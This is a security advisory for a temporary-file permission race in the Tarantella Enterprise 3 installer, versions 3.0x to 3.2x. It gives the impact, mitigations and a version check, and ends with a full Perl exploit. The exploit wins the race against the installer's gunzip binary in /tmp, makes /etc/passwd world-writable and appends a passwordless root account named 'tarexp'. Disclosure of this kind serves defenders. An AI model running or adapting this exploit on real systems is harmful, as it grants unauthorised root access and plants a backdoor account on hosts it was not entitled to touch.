|
Brought to you by:
Suppliers of:
|
|
|
| |
| Tarantella Enterprise has been found to contain a permissions problem on some of its temporary files that are used during the installation process. This would allow an attacker to gain elevated privileges. |
| |
Credit:
The information has been provided by Larry W. Cashdollar.
|
| |
Vulnerable systems:
* Tarantella Enterprise 3, version 3.2x on all operating systems.
* Tarantella Enterprise 3, version 3.1x on all operating systems.
* Tarantella Enterprise 3, version 3.0x on all operating systems.
Impact:
If a user has access to a host before or during the installation of Tarantella Enterprise 3 software on that host, it is possible for that user to gain root privileges on that host.
Solution:
We recommend:
* Use a separate, dedicated host for Tarantella Enterprise 3 software.
* Make sure that only trusted users have access to this host - before, during and after installation.
* Ensure that no temporary files are present before starting installation.
* Use the latest version of the product that is in fact immune to this problem.
Checking for vulnerable installations:
An installation is vulnerable if the following is true:
* The installation is Tarantella Enterprise 3 version 3.0x, 3.1x or 3.2x on any operating system.
To check the version of your installation:
1) Log in to the UNIX host on which the Tarantella Enterprise 3 software is installed.
2) Type the following (replacing /opt/tarantella with the name of your installation directory, if different):
/opt/tarantella/bin/tarantella version
3) This displays the version numbers of all installed components. Check the version number for the main component (shown as "Tarantella Enterprise 3 for operating system").
* If this begins 3.2, 3.1 or 3.0, then the installation is vulnerable.
* In all other cases the installation is not vulnerable.
Exploit:
#!/usr/bin/perl -w
#Another Exploit for tarantella enterprise 3 installation.
#Larry Cashdollar lwc@vapid.dhs.org 2/08/2002
#Exploits gunzip$$ binary being created in /tmp with perm 777
#http://online.securityfocus.com/bid/3966
#Experimental ext3 kernel mods for preventing/researching race conditions.
#http://vapid.dhs.org/tmp-patch-kernel-2.4.17.html
use strict;
`cat << -EOF- > root.sh
#!/bin/sh
chmod 777 /etc/passwd
echo "tarexp::0:0:Tarantella Exploit:/:/bin/bash" >> /etc/passwd
-EOF-`;
my $OUT = '';
while(!$OUT) {
$OUT = `ps -ax |grep gunzip |grep -v grep`;
print "Found $OUT\n";
}
my @args = split(' ',$OUT);
# Do this with one copy operation. This will break installation of tarantella.
# should test for -w on /etc/passwd stop and su - tarexp.
while(1) {
`cp root.sh $args[4]`;
}
|
|
|
|
|
